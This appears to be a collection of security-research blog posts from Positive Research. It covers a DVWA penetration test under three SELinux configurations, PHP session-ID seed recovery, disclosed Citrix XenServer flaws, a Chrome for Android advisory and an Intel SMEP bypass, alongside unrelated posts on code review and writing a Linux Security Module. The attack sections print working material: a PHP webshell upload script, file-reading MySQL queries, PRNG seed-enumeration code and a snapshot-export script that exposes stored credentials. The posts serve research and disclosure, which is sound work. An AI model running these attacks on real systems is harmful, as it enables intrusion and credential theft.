
SELinux in Practice: DVWA Test

Since the last article on SELinux came out, we have been receiving requests to prove the benefits of the security subsystem 'in practice'. So we decided to test it. We built an infrastructure of three vulnerable machines with default configurations (Damn Vulnerable Web Application on CentOS 5.8). They differed only in their SELinux configuration: it was disabled on the first machine, while the other two had the out-of-the-box policies applied, namely targeted and strict.

This set of virtual machines was then subjected to penetration testing. Let's take a look at the results!

Let's consider the host settings first. The samples were created on CentOS 5.8 'lit up' with a LAMP stack. When setting up the hosts, I tried to make all the mistakes typical of users: connecting to the database with superuser privileges and applying default settings wherever possible. The idea was to recreate three probable courses of events diverging from the same starting point.

The initial server is an Apache embraced by Red Hat (almost like Little Red Riding Hood), dressed in all sorts of new outfits by the yum utility. Of course, this tale has a Granny as well: each host runs a MySQL database. This wonderful company wouldn't be complete without the extremely vulnerable Wolf — Damn Vulnerable Web Application — which can lead us to almost all the other characters. However, on two of the servers an armed Hunter lies in wait for hackers: SELinux, which won't hesitate to shoot off all of the Wolf's limbs once it spots any suspicious activity.

SELinux is disabled on the insecure server. This is the standard recommendation suggested in the how-tos on the Site-That-Must-Not-Be-Named. Everything is in its place; httpd and mysqld have default settings. So there is no extra defense on the host, and everything depends solely on the resilience of the services.

To protect the second server, I opted for SELinux with the targeted policy. Nobody made any changes to it: the out-of-the-box solution, exactly the way the vendor ships it. The services start in their predetermined domains and behave according to their 'standard functionality' — as the Red Hat engineers see it.

The last configuration is the 'strict' SELinux policy which, according to the vendor's plan, works on the whitelist principle: everything that is not explicitly allowed is forbidden. I tried to secure the file system with the required contexts, granting only minimum privileges. This configuration ensures quite a high security level without going to extremes.

I asked my colleague at Positive Technologies (he goes by the name ki11obyte on Habrahabr) to do the penetration testing. Here is what he says about it:

Let's start with the machine that has SELinux disabled. The server was labeled as vulnerable from the start, so it wasn't difficult to get a webshell.

There is a form for uploading images to the server that checks only the Content-Type field of the request. We upload a PHP webshell by changing the Content-Type (in this case, using Burp Suite) to image/jpeg.
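The same trick is easy to script. Below is a minimal sketch of such an upload in Python, assuming DVWA's standard upload form (the target URL, cookie values, and form field names are illustrative and need adjusting for a real setup):

import requests

# Hypothetical target and session values -- adjust for the actual setup.
TARGET = "http://192.168.1.10/dvwa/vulnerabilities/upload/"
COOKIES = {"PHPSESSID": "0123456789abcdef", "security": "low"}

# A one-line PHP webshell; the spoofed Content-Type gets it past the check.
payload = b"<?php system($_GET['cmd']); ?>"

files = {"uploaded": ("shell.php", payload, "image/jpeg")}
data = {"Upload": "Upload"}

resp = requests.post(TARGET, cookies=COOKIES, files=files, data=data)
print(resp.status_code)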


The shell gets checked and uploaded to the server.


The configured SELinux also failed to protect the system in this case.

Then we need to execute the webshell. To do that, let's find a vulnerable script that allows loading other scripts.


The file is successfully installed on each of the machines. Hence, SELinux does not protect us from errors in web applications.

Now we can easily execute commands via the uploaded webshell. 


Or we can use a reverse connection to get a more familiar console.


Now it's the turn of the machine with SELinux enabled. We get the webshell again — and this time feel a touch of disappointment: not enough privileges to create sockets or even to execute ls.

  

However, despite being unable to list directories, we can still view files.


By the way, we managed to perform the listing by means of PHP.


Besides, we were able to create a file, make it executable, and execute it.


The next step was to hijack the DBMS. Via the webshell we peek at the MySQL configuration file of the web application and use it to establish a connection.
The SELECT LOAD_FILE('/etc/passwd') query allows viewing files. We can also easily save a file to the temporary directory: SELECT 1 INTO OUTFILE '/tmp/ololo'. What really struck us as odd were the rather nontrivial privileges of the created file.


The machine with SELinux enabled and configured was no different, which was a bit disappointing.


The experiment led us to the following conclusions. First of all, I was wrong about the vulnerable application I had chosen: DVWA is a bad match for SELinux. Most of its 'vulnerabilities' provide access to data that is accessible from the httpd_t domain anyway. As a result, it remains unclear how we could help poor Little Red Riding Hood (Red Hat) and the yielding Apache. The only reasonable choice was to restrict access to most binary files and prohibit reverse connections. In the remaining cases, the attacker's actions were beyond the competence of the security subsystem in its standard configuration.

Secondly, it became absolutely clear that setting up SELinux for a web project is a time-consuming challenge that requires good knowledge and constant effort. Note that I'm not talking about some 'ordinary security of a web server' but about solid security for the entire project. It is possible to work out your own policy for interaction between contexts, but it doesn't seem reasonable. My personal opinion is that in this case much depends on correct settings of PHP and httpd and on regular updates.

So SELinux can, at the very least, record suspicious activity in the system. And if you bother to configure it carefully, it will even be able to stop unauthorized actions. Unfortunately, it won't protect your web project from code errors or misconfiguration.

Author: Kirill Ermakov, Positive Research

Positive Technologies Became Cisco’s Official Technology Partner

Cisco Systems has awarded Positive Technologies the status of Cisco Registered Developer; notably, ours is the first Russian company to be granted this status. Positive Technologies now has its own profile on the official Cisco Systems website.


This status reflects a new level of cooperation between the two companies. It gives Positive Technologies researchers expanded access to special development resources: software, updates, and documentation. Besides, it grants the right to file development-related tickets with Cisco TAC (Technical Assistance Center). With these opportunities in hand, Positive Technologies specialists will be able to improve support for Cisco products in the MaxPatrol Vulnerability and Compliance Management System.

The official technology partnership is a logical step that gives legal form to the long-standing collaboration between the companies. Back in 2009, Positive Technologies' MaxPatrol was integrated with Cisco MARS, which monitors and analyzes information security events in corporate information systems and responds promptly to incidents.

This year, MaxPatrol was enhanced with support for Cisco Nexus switches. Specialists at the Russian office of Cisco Systems assisted Positive Technologies by granting access to the required equipment.

Experts of Positive Research will continue their work on advancing the security of network devices. Alongside equipment from Cisco Systems, MaxPatrol already supports appliances from other vendors: Juniper, Nortel, Check Point, Huawei, Arbor Networks, and D-Link. No doubt the list will be expanded. Every year, the intensive work of the Positive Research center helps detect over 100 vulnerabilities in various systems and applications.



Code Review Implemented into Development

Attention! This article is meant for people who know what a code review is and who want to implement this practice in their companies.




When we started implementing code reviews in our projects, we were disappointed by the lack of good materials on organizing the process from scratch. Another aspect that has hardly ever been described is review scaling.

To fill this gap, we want to share our team's experience in implementing this wonderful practice. Constructive comments are welcome.

So let's get started.

What is it for?

First of all, let's define the goals we want to achieve by reviewing code. Of course, these goals differ for each project and project team. They are influenced by the project's character (one-time or long-term), its lifetime (short or long maintenance cycle), etc. The following goals are the most important to us:

  1. Decreasing the number of defects detected by our colleagues from the software quality control department and by the company's clients.
  2. Reducing application maintenance costs by increasing code quality.
  3. Ensuring the quality and quantity of unit tests.
  4. Ensuring collective code ownership.
  5. Ensuring the exchange of experience among team members.
  6. Improving code style. Detecting and discussing style controversies within the team.

Who participates in a review?

Let's define several terms that will be used within the topic.

Author is a code developer.

Reviewer is a developer responsible for all changes getting into a particular module or path in a project branch.

Observer is a developer brought in as an expert.

When to review?

Now let's define the place of code reviews in the development process — that is, when to review: before code is added to the repository (pre-commit) or after (post-commit). The choice should be made very carefully, because introducing code reviews is often a delicate matter. Teams in which private code ownership prevails (and that happens pretty often) are at the greatest risk. That is why it is reasonable to start with post-commit reviews, to minimize the risk of missing project deadlines due to the inevitable "holy wars" so common in the beginning. As the project team gathers the necessary experience, pre-commit reviews can be introduced.


It is worth noting that we chose pre-commit reviews at first.

How does it work?

A developer who creates a review adds the following participants:

  1. a reviewer of their group;
  2. a lead of their group.

The group lead assigns observers from among the group leads whose modules have been changed.
The group leads assign reviewers from their groups.


Such an approach ensures decentralized appointment of review participants and scales perfectly both vertically (in the hierarchy) and horizontally (as the number of project groups grows).
What is needed for implementation?

Several conditions must be met to implement code reviews successfully.


  • Before code is added to the repository, it is always reviewed by at least one person who knows it well.
  • Developers always know about any changes introduced into their projects by other groups.
  • A group lead knows everything the group does and maintains a good overview of all of the group's code.
  • Within a group, developers have sufficient knowledge of the code written by their colleagues.
  • If these conditions are met, project participants achieve a good level of collective code ownership.

This is it, I think :)

If the IT community is interested in the topic of code review and a description of our experience, we'll dedicate one of our next articles to review automation using SmartBear's CodeCollaborator.


Thank you for your attention!

Practical Example of Code Review Implementation


Our previous post about the code review process implemented in our company attracted particular interest from the IT community, so we decided to write an extra article on the theme. Today we'll walk through this practice using a specific example.

Let's consider code review implementation as exemplified by a project and its team structure. There are two groups in the team: one consists of two developers and a lead, and the other of three developers and a lead. The developers are marked D (Developer) and the leads L (Lead).

Let's define the group members.

Group 1: D_1_1, D_1_2, L_1.
Group 2: D_2_1, D_2_2, D_2_3, L_2.

We assign reviewers to the project trunk.


trunk/module_1 — group 1 is responsible.
trunk/module_2 — group 2 is responsible.
trunk/common — shared responsibility of both groups; each lead appoints particular reviewers from his or her own group.
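To make the responsibility mapping concrete, here is a toy sketch in Python of how changed paths resolve to the groups whose review a change set needs (the mapping mirrors the example above; the resolution logic itself is our illustration, not a prescribed tool):

# Path prefixes and the groups responsible for them, as defined above.
RESPONSIBILITY = {
    "trunk/module_1": ["group_1"],
    "trunk/module_2": ["group_2"],
    "trunk/common":   ["group_1", "group_2"],
}

def groups_for_change(changed_paths):
    """Return the set of groups that must take part in the review."""
    groups = set()
    for path in changed_paths:
        for prefix, responsible in RESPONSIBILITY.items():
            if path.startswith(prefix):
                groups.update(responsible)
    return groups

print(groups_for_change(["trunk/module_1/dev_1_1", "trunk/module_2/dev_2_3"]))
# {'group_1', 'group_2'}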

A developer writes code affecting both groups' modules


1. Developer D_1_2 solves a task, writing code that affects the following paths: trunk/module_1/dev_1_1 and trunk/module_2/dev_2_3.

2. D_1_2 creates a review and adds the following participants.


3. Lead L_2 appoints developer D_2_3 as a reviewer.

4. The final table of the review participants looks as follows.


A developer writes code to a common module


1. Developer D_1_2 solves a task, writing code in trunk/common.

2. D_1_2 creates a review and adds the following participants.


3. Lead L_1 appoints himself or herself as a reviewer.

4. Lead L_2 appoints developer D_2_1 as a reviewer.

5. The final table of the review participants looks as follows.


It is important to realize that launching a code review within a small group of 6-7 developers is one thing, and scaling it to a huge project developed by dozens of specialists is quite another. Huge projects have many more hidden rocks, which are simply not visible in smaller-scale projects — do not forget about it.

The next article (as promised in the previous post) will be dedicated to review automation using CodeCollaborator.

Bye for now!

Not So Random Numbers. Take Two

George Argyros and Aggelos Kiayias have recently published awesome research on attacks against the pseudorandom number generator in PHP. However, it lacked practical tools implementing the attack. That is why we conducted our own research, which led to the creation of a program to brute-force PHPSESSID.

How can we get mt_rand seed via PHPSESSID?


PHPSESSID is generated this way:

md5( client IP . timestamp . microseconds1 . php_combined_lcg() )
  • the client IP is known to the attacker;
  • the timestamp is known from the Date HTTP header;
  • microseconds1 is a value from 0 to 1000000;
  • php_combined_lcg() is a value like 0.12345678.

To generate php_combined_lcg(), two seeds are used:

S1 = timestamp XOR (microseconds2 << 11)
S2 = pid XOR (microseconds3 << 11)
  • the timestamp is the same;
  • microseconds2 is greater than microseconds1 (taken at the first time measurement) by 0–3;
  • pid is the ID of the current process (0–32768 in general, 1024–32768 on Unix);
  • microseconds3 is greater than microseconds2 by 1–4.
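Once microseconds1 is recovered, the remaining unknowns span a small space that can simply be enumerated. A sketch of a generator over that space, following the formulas and deltas above:

def candidate_seeds(timestamp, usec1, pid_range=range(1024, 32769)):
    # microseconds2 = microseconds1 + 0..3,
    # microseconds3 = microseconds2 + 1..4 (per the deltas above).
    for d2 in range(0, 4):
        usec2 = usec1 + d2
        s1 = timestamp ^ (usec2 << 11)
        for d3 in range(1, 5):
            usec3 = usec2 + d3
            for pid in pid_range:
                s2 = pid ^ (usec3 << 11)
                yield s1, s2, pid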

The greatest entropy is contained in microseconds1; however, two techniques can reduce it substantially.

Adversarial Time Synchronization


The technique is based on sending pairs of requests in order to determine the moment when the second in the Date HTTP header changes.

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2012 06:05:14 GMT

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2012 06:05:15 GMT

When that happens, the server's microseconds counter passed zero between our two requests. By sending requests with dynamically adjusted delays, it is possible to synchronize the local microseconds value with the server's.
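A rough sketch of this idea (the URL is a placeholder, and a practical tool would adapt the delay instead of polling in fixed steps):

import time
import urllib.request

URL = "http://target.example/"  # placeholder

def server_date(url):
    # We only care about the Date header of the response.
    return urllib.request.urlopen(url).headers["Date"]

# Send pairs of requests until the Date second flips between them:
# at that moment the server-side microseconds are close to zero.
while True:
    t0 = time.time()
    if server_date(URL) != server_date(URL):
        print("second boundary near local time", t0)
        break
    time.sleep(0.05)  # shift the probing phase and retry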

Request Twins


The principle of this technique is simple. The attacker sends two requests back to back: the first to reset their own password, the second to reset the administrator's. The gap between the microseconds values will be minimal.

To sum up, the MD5 PHPSESSID hash is brute-forced over microseconds, the deltas of the subsequent time measurements, and the pid. As for the pid, the authors have not mentioned a great helper: Apache's server-status page, which reveals, among other information, the pids of the processes serving the requests.

To perform the brute force, a module for the popular program PasswordsPro was created first. However, this solution made it impossible to take into account the positive linear correlation between the deltas of microseconds, so it brute-forced the full range of values. The speed was about 12 million hashes per second.

That is why we created our own GUI application for this task.


The speed is about 16 million hashes per second; seed calculation takes less than an hour on a 3.2 GHz Quad Core i5.

Having the pid and php_combined_lcg, one can compute the seed used in mt_rand. It is generated this way:

(timestamp × pid) XOR (10^6 × php_combined_lcg())
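In code, with the multiplier written out (the input values are placeholders, and the 32-bit truncation assumes a 32-bit PHP build):

def mt_rand_seed(timestamp, pid, lcg):
    # Per the formula above: (timestamp * pid) XOR (10^6 * lcg),
    # truncated to 32 bits.
    return ((timestamp * pid) ^ int(1000000.0 * lcg)) & 0xFFFFFFFF

print(mt_rand_seed(1344405914, 4321, 0.12345678))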

Besides, php_combined_lcg is used as additional entropy for the uniqid function (if it is called with the second argument being true).

So, if a web application uses standard PHP sessions, it is possible to obtain the random numbers generated via mt_rand(), rand(), and uniqid().

How can we get the mt_rand seed through a leak of one of the random numbers?

The seed used for mt_rand is an unsigned 32-bit integer (2^32 possible values). If a random number has leaked, it is possible to recover the seed using PHP itself and rainbow tables. It takes less than 10 minutes.
The scripts for generating rainbow tables and searching for the seed, as well as ready-made tables, are available here: http://www.gat3way.eu/poc/mtrt/


What to look for in the code?

All of mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure function is openssl_random_pseudo_bytes(), but it is rarely used in web applications. The main ways to defend against such attacks are the following:

  • the MySQL function RAND() — though it can also be predicted;
  • the Suhosin patch — it does not patch mt_srand and srand; the Suhosin extension should also be installed;
  • /dev/urandom — the most secure way.



Arseny Reutov
Timur Yunusov
Dmitry Nagibin

Writing Linux Security Module

Linux Security Modules (LSM) is a framework allowing Linux to support various security models. LSM has been a part of the kernel starting with Linux v. 2.6. Currently, the official kernel hosts such security modules as SELinux, AppArmor, Tomoyo, and Smack.

The modules run alongside the native Linux security model, Discretionary Access Control (DAC). LSM checks are triggered only for actions that DAC has already allowed.

The LSM mechanism can be used in various ways. Generally, it serves to add mandatory access control (as, for example, in the case of SELinux). Besides, you can invent your own security model and implement it as a module using the framework. As an example, let's consider implementing a module that grants privileges for system actions only if a specific USB device is connected.

Let's take a look at the diagram and try to understand the way the LSM hook works (using the system call open as an example).


Nothing extraordinary. LSM's main purpose is to provide security modules with a mechanism for controlling access to kernel objects (hooks are inserted into the kernel code right before object accesses). Before the kernel touches an internal object, a check function provided by LSM is called.

In other words, LSM allows the modules to understand whether subject S is allowed to perform action OP over kernel's internal object OBJ.
This is really great.

It is reasonable to write a security module skeleton first. It will be very modest and will always agree with DAC. The source code we need is located in the security directory of the kernel source tree.

Digging the sources


Go to include/linux/security.h (my kernel version is 2.6.39.4). The most important thing here is the huge structure security_operations.
Here is a fragment of it:
struct security_operations {
	char name[SECURITY_NAME_MAX + 1];

	int (*ptrace_access_check) (struct task_struct *child, unsigned int mode);
	int (*ptrace_traceme) (struct task_struct *parent);
	int (*capget) (struct task_struct *target,
		       kernel_cap_t *effective,
		       kernel_cap_t *inheritable, kernel_cap_t *permitted);
	/* ... */
};
It is a list of predefined and documented callback functions available for security module checks. By default, these functions usually return 0, thus allowing any action. However, some of them implement the POSIX capabilities model. These are the Common Capabilities functions, which you can review in the security/commoncap.c file.

In this case we are interested in the following function from security/security.c:

/**
 * register_security – registers the security module with the kernel.
 * @ops: a pointer to the structure security_operations that will be used.
 *
 * This function allows a security module to register itself with the
 * kernel security subsystem.  Some rudimentary checking is done on the @ops
 * value passed to this function. You'll need to check first if your LSM
 * is allowed to register its @ops by calling security_module_enable(@ops).
 *
 * If the security module has been already registered with the kernel, an error
 * will be returned. In case of success, 0 will be returned
 */
int __init register_security(struct security_operations *ops)
{
	if (verify(ops)) {
		printk(KERN_DEBUG "%s could not verify "
		       "security_operations structure.\n", __func__);
		return -EINVAL;
	}

	if (security_ops != &default_security_ops)
		return -EAGAIN;

	security_ops = ops;

	return 0;
}

Writing the skeleton


I have BackTrack 5 R1 (kernel version 2.6.39.4) at hand. Let's look at an existing security module, for example SELinux (the security/selinux/ directory). Its main mechanism is described in the hooks.c file. Based on this file, I created the skeleton of a new security module (a little later we'll make something interesting out of it).

We fill the monstrous security_operations structure with pointers to our own functions. You only have to replace SELinux with the name of your module (in my example it is PtLSM) in all the function names. Then edit the bodies of all the functions: those that return void should be empty, and those that return int should return 0. As a result, we have an LSM that does nothing and allows everything the native security mechanism allows (the module source code: pastebin.com/Cst0VVQh).

Here comes a small, sad digression. For security reasons, starting with version 2.6.24 the kernel no longer exports the symbols necessary for implementing security modules as loadable kernel modules (LKM). For instance, the register_security function, which registers a module and its hooks, was removed from the export list. That is why we are going to compile the kernel together with our module.

Create a directory named after the module, PtLSM: /usr/src/linux-2.6.39.4/security/ptlsm/.
To build the module, perform the following actions:

1. Create Makefile:

obj-$(CONFIG_SECURITY_PTLSM) += ptlsm.o

2. Create Kconfig:

config SECURITY_PTLSM
	bool "Positive Protection"
	default n
	help
	  This module does nothing in a positive kind of way.

	  If you are unsure how to answer this question, answer N.

3. Edit /security/Makefile and /security/Kconfig to make the new module known to the rest of the world. Add lines similar to those of the other modules.

My files with added PtLSM:
1) Makefile — pastebin.com/k7amsnQK
2) Kconfig — pastebin.com/YDsPBGAz

Then run make menuconfig in the kernel source directory and choose PtLSM among the Security options.



Now run make, make modules_install, and make install. The module is built into the kernel, and using the dmesg utility you can check what the module writes to the log.

Writing a super cool module


It is time to make our module incredibly cool! Let the module deny any actions on the computer if a USB device with a given Vendor ID and Product ID is not connected to it (I use the IDs of a Galaxy S II as an example).


I have changed the body of the ptlsm_inode_create function, which decides whether a process may create files. If the function finds the device of 'the supreme power,' it allows execution. Similar checks can be performed for any other actions.
static int ptlsm_inode_create(struct inode *dir, struct dentry *dentry, int mask)
{
    if (find_usb_device() != 0)
    {
        printk(KERN_ALERT "You shall not pass!\n");
        return -EACCES;
    }
    else {
        printk(KERN_ALERT "Found supreme USB device\n");
    }

    return 0;
}
Now it would be useful to write the find_usb_device function. It walks all USB devices in the system, looking for the one with the required IDs. Information about USB devices is stored as trees whose roots are the root hub devices. The list of all the roots is in usb_bus_list.
static int find_usb_device(void)
{
    struct list_head* buslist;
    struct usb_bus* bus;
    int retval = -ENODEV;

    mutex_lock(&usb_bus_list_lock);

    for (buslist = usb_bus_list.next; buslist != &usb_bus_list; buslist = buslist->next) 
    {
        bus = container_of(buslist, struct usb_bus, bus_list);
        retval = match_device(bus->root_hub);
        if (retval == 0)
        {
            break;
        }
    }    

    mutex_unlock(&usb_bus_list_lock);
    return retval;
}
And finally, let's consider the match_device function, which checks the Vendor ID and Product ID.

static int match_device(struct usb_device* dev)
{
    int retval = -ENODEV;
    int child;

    if ((dev->descriptor.idVendor == vendor_id) &&
        (dev->descriptor.idProduct == product_id)) 
    {
        return 0;
    }

    for (child = 0; child < dev->maxchild; ++child) 
    {
        if (dev->children[child]) 
        {
            retval = match_device(dev->children[child]);
            if (retval == 0)
            {
                return retval;
            }
        }
    }

    return retval;
}

Let's add a couple of headers for working with USB:

#include <linux/usb.h>
#include <linux/usb/hcd.h>

Repeat the steps to build the module into the kernel. And buy a cool cell phone to be able to use your computer.


Author: Dmitry Sadovnikov, Positive Research.

Gaining Control Over Cloud Infrastructure. Easy as One, Two, Three

Several months ago the Positive Research Center analyzed the security of Citrix XenServer. Among other things, we studied the security of administration interfaces, in particular the web interfaces of various system components. As a result, we found several critical vulnerabilities that allow obtaining control not only over these components but over the master server as well — that is, over the whole cloud infrastructure. Citrix was immediately notified of the detected vulnerabilities. After the issues had been fixed ([1], [2], [3]), the results were disclosed at the Positive Hack Days forum as part of the FastTrack section.

So let's get down to business.
During the analysis, we focused on three components of Citrix XenServer:

  1. Web Self Service — a web-based virtual machine management console.
  2. vSwitch Controller — a web console for virtual network infrastructure management.
  3. License Administration Console — XenServer license management service.

We tested the latest (at the time of the research) version of XenServer, 6.0.0.

Web Self Service


This component is a web-based virtual machine management console.
As in all the other modules, we detected a common set of web vulnerabilities:

  • Cross-site request forgery (CSRF);
  • Cross-site scripting (stored XSS);
  • URL redirector abuse;
  • HTTP response splitting.

All forms of the application were exposed to CSRF, and many fields were not properly filtered, which made stored XSS possible. Moreover, on the system logon page we detected a very "useful" parameter allowing URL redirector abuse and HTTP response splitting. The video demonstrates the automated exploit in action. The exploit obtains an administrator cookie via the first three vulnerabilities and then covers its tracks.
  1. At first we redirect the administrator to a specially crafted page using URL redirector abuse.
  2. The page's script creates a new system account via CSRF. The user name field is vulnerable to stored XSS; by exploiting it, we inject a useful JavaScript payload into the page with the user list and redirect the administrator there.
  3. The injected JavaScript code sends the administrator cookie to our server and then removes the account that has just been created.


vSwitch Controller


This component was the most interesting. The following vulnerabilities were detected in it:

  • Cross-site request forgery (CSRF);
  • URL redirector abuse;
  • HTTP response splitting;
  • Insufficient authorization.

The vSwitch Controller web interface uses a REST API to communicate with the server, which means an HTTP request is generated for each user action. Depending on their privileges, users are either allowed or not allowed to execute specific requests.

Moreover, the web interface of the vSwitch Controller allows an administrator to make configuration snapshots. Only privileged users should have the right to download these snapshots. However, it turned out that a user with read-only permissions can also download a snapshot by manually crafting a request to the REST API:

GET /ws.v1/nox/snapshot/<snapshot_id>/export

where <snapshot_id> is the identifier of the snapshot to be downloaded.
You can receive the list of all snapshots and their identifiers by sending the following request:

GET /ws.v1/nox/snapshot/

The snapshot contains all vSwitch Controller parameters, the data of the vSwitch Controller users (account names and salted password hashes), the server's SSL certificate together with its private key, and the plaintext credentials of the master server's privileged user. Using these credentials, you can connect via SSH to the XenServer master server and obtain control over the whole XenServer infrastructure. Once such access is gained, an attacker's possibilities are limited only by imagination.
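A minimal sketch of this snapshot exfiltration, assuming a read-only account, HTTP Basic authentication, and a JSON list in the response (the host, credentials, and response format are assumptions about a particular deployment):

import requests

CONTROLLER = "https://vswitch.example"  # placeholder
AUTH = ("readonly", "password")         # low-privileged account

# Enumerate the snapshots, then pull each one via the export call
# that should have required elevated privileges.
snapshot_ids = requests.get(CONTROLLER + "/ws.v1/nox/snapshot/",
                            auth=AUTH, verify=False).json()
for snap_id in snapshot_ids:
    url = "%s/ws.v1/nox/snapshot/%s/export" % (CONTROLLER, snap_id)
    data = requests.get(url, auth=AUTH, verify=False).content
    with open("snapshot_%s.bin" % snap_id, "wb") as f:
        f.write(data)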

Exploiting this vulnerability on its own is difficult, because it requires the privileges of a read-only user. However, the CSRF vulnerability comes to the rescue: it allows an attacker to create the necessary account with a known password and stay unnoticed by the administrator (you only need to trick the administrator into following a phishing link).



License Administration Console


This component is meant for license management and is based on lmadmin, Flexera Software's free license server manager. We managed to detect the following vulnerabilities:

  • Content spoofing;
  • Cross-site scripting (stored XSS);
  • Cross-site request forgery (CSRF);
  • Denial of service.
Reviewing the links, you can see that the main page of the site has an interesting GET parameter, admin, which determines the address of the link to the administrator section. The value is filtered in such a way that a full XSS attack is impossible, but nothing prevents you from slipping in a link to an arbitrary resource. Denial of service can be caused by a single HTTP request in which one of the parameters is passed as an array, for instance:

?admin[]=blah

The attacker does not even need to be authorized in the system. The cause is an uncaught exception raised when an array is passed as a script parameter; this is also why we failed to achieve arbitrary code execution through this vulnerability.

It is worth noting that the latest (at that moment) version of lmadmin no longer contained these vulnerabilities.



Finally, the following conclusion can be drawn: vulnerabilities ranked as non-critical should not be ignored. Applied together, several simple vulnerabilities can be combined into an attack that gives the attacker full control over the system. Such scenarios have been implemented successfully many times (including in penetration tests).

No product is immune to defects; vulnerabilities have always existed and will never disappear. It is great when vendors address security issues and provide patches promptly, as happened this time, but unfortunately such a response is not the rule.

However, the risks can be mitigated. Almost all of the above flaws can be eliminated by taking additional measures to limit access to the XenServer administration interfaces. Moreover, many of these vulnerabilities are triggered by a simple CSRF attack. Stay vigilant, especially when dealing with suspicious links.

Author: Maxim Tsoy, Positive Research

Vulnerabilities in Android Devices Allowed Stealing Money and Passwords

Artem Chaykin, an expert at the Positive Research Center, has discovered two critical vulnerabilities in Chrome for Android. The vulnerabilities threatened the security of the majority of new smartphones and tablets, since Chrome has been the main web browser of the system starting from Android 4.1 (Jelly Bean).

By exploiting the first of these vulnerabilities, an attacker could get access to user data stored in Chrome, including clickstream data, cookies, web cache, etc.

The other vulnerability allowed executing arbitrary JavaScript code in the security context of an arbitrary site — a case of universal cross-site scripting (UXSS). By conducting such an attack, a cybercriminal could, for example, compromise the bank account of a mobile banking user and steal their money.
Thanks to Google's professional approach, the vulnerabilities in Chrome for Android have been promptly fixed. To eliminate the defects in the browser's security, users should install the new version of Chrome.

By the way, in 2010 the names of several Positive Technologies experts were placed in the Google Security Hall of Fame. In spring 2012, the Positive Technologies expert Dmitry Serebryannikov found a critical vulnerability in the corporation's site and won an award as part of the Vulnerability Reward Program.


Intel SMEP overview and partial bypass on Windows 8


Author: Artem Shishkin


English whitepaper (PDF): here
Russian whitepaper (PDF): here




1.    Introduction


        With the new generation of Intel processors based on the Ivy Bridge architecture, a new security feature has been introduced. It is called SMEP, which stands for “Supervisor Mode Execution Prevention”. Basically, it prevents execution of code located on a user-mode page at CPL = 0. From an attacker's point of view, this feature significantly complicates exploitation of kernel-mode vulnerabilities, because there is simply no place to store the shellcode. Usually, when exploiting a kernel-mode vulnerability, an attacker would allocate a special user-mode buffer with a shellcode and then trigger the vulnerability, gaining control of the execution flow and redirecting it to execute the prepared buffer contents.
        So if attackers are unable to execute their shellcode, the whole attack is meaningless. Of course, there are other techniques, such as return-oriented programming, for exploiting vulnerabilities with an effective payload. But there are also certain cases when the execution environment, not being properly configured, allows bypassing the security feature. Let's take a closer look at this technology and its software support in Windows 8, the operating system that introduces SMEP support.



2.    Hardware support of SMEP


        This section gives an overview of SMEP hardware support.
        SMEP is part of the page-level protection mechanism. In fact, it reuses an already existing flag of a page-table entry: the U/S flag (User/Supervisor, bit 2). This flag indicates whether a page is a user-mode page or a kernel-mode one, and it defines who may access the page: if a page belongs to the OS kernel, which executes in supervisor mode, it cannot be accessed by a user-mode application.

        SMEP is enabled or disabled via the CR4 control register (bit 20). It slightly modifies the effect of the U/S flag: whenever supervisor-mode code attempts to execute code located on a page whose flag is set to U, indicating a user-mode page, the hardware generates a page fault due to an access-rights violation (the access rights are described in Volume 3, chapter 4.6 [1]).

        Note that the violation generates #PF rather than #GP, so the software has to handle SMEP violations in the page-fault handler. We will use this point later when analyzing the software support of this mechanism.


3.    Software support of SMEP



        SMEP support can be detected via the “cpuid” instruction. As stated in [1], the result of a “cpuid” level 7 (sublevel 0) query indicates whether the processor supports SMEP: bit 7 of the EBX register has to be tested.

        The x64 version of Windows 8 checks SMEP feature presence during the initialization of boot structures, filling in the “KeFeatureBits” variable:

KiSystemStartup() → KiInitializeBootStructures() → KiSetFeatureBits()

The same is done on x86 version of Windows 8:

KiSystemStartup() → KiInitializeKernel() → KiGetFeatureBits()

The variable “KeFeatureBits” is then used in handling a page fault.

        If SMEP is supported by the current processor, it is enabled. On the x86 version, this also happens during startup, at phase 1, in the KiInitMachineDependent() function; later SMEP is initialized per processor core by issuing an IPI, which eventually calls the KiConfigureDynamicProcessor() function. The same happens on the x64 OS version, except that there is no KiInitMachineDependent() function.

        So we have SMEP enabled and “KeFeatureBits” initialized at system startup. The other part of the software support is the code of the page-fault handler. A new helper function has been added in Windows 8 — MI_CHECK_KERNEL_NOEXECUTE_FAULT(). The check for an access fault caused by an SMEP or NX violation is performed inside it. The result of an SMEP or NX violation is a bugcheck and a blue screen of death with the code “ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY”:

KiTrap0E()/KiPageFault() → MmAccessFault() → … →
→ MI_CHECK_KERNEL_NOEXECUTE_FAULT()

The previously mentioned function is implemented in Windows 8 only.


4.    The way to bypass SMEP on Windows and its mitigation



        It is natural to conclude that if you cannot store your shellcode in user mode, you have to find a way to store it somewhere in the kernel space. The most obvious solution is to use Windows objects, such as WinAPI objects (events, timers, sections, etc.) or GDI objects (brushes, DCs, etc.). They are accessed indirectly from user mode via WinAPI calls that issue system calls. The point is that the object body is kept in the kernel, yet some object fields can be modified from user mode, so an attacker can transfer the needed shellcode bytes from user-mode memory into the kernel.

        It is also obvious that an attacker needs to know where the used object's body is located in the kernel, which requires a certain information disclosure. As we remember, a user-mode application is unable to read kernel-mode memory; still, certain sources of information about the kernel space are available in Windows [2].

        So it is theoretically possible to bypass SMEP on Windows thanks to kernel-space information disclosure. But SMEP is backed up by the fact that the kernel pools where the objects are kept are protected with the NX (non-executable) flag in Windows 8.

        A number of WinAPI and GDI objects have been tested for suitability as a shellcode delivery tool. WinAPI objects are stored in the paged or the non-paged pool; GDI objects are stored in the paged session pool. All of them now happen to be non-executable. Moreover, according to the results of scanning the page tables, only a negligible number of pages are allocated from executable pools. All data buffers are now non-executable, and most executable pages (e.g., driver images) are not writable.

4.1.     The flaw


        As mentioned above, all of the objects in Windows 8 are now kept in non-executable pools. This is true for the x64 version of Windows 8 and only partially true for the x86 version. The flaw is the paged session pool: it is marked executable on the x86 version of Windows 8, so a suitable GDI object can be used to store the shellcode in kernel memory.

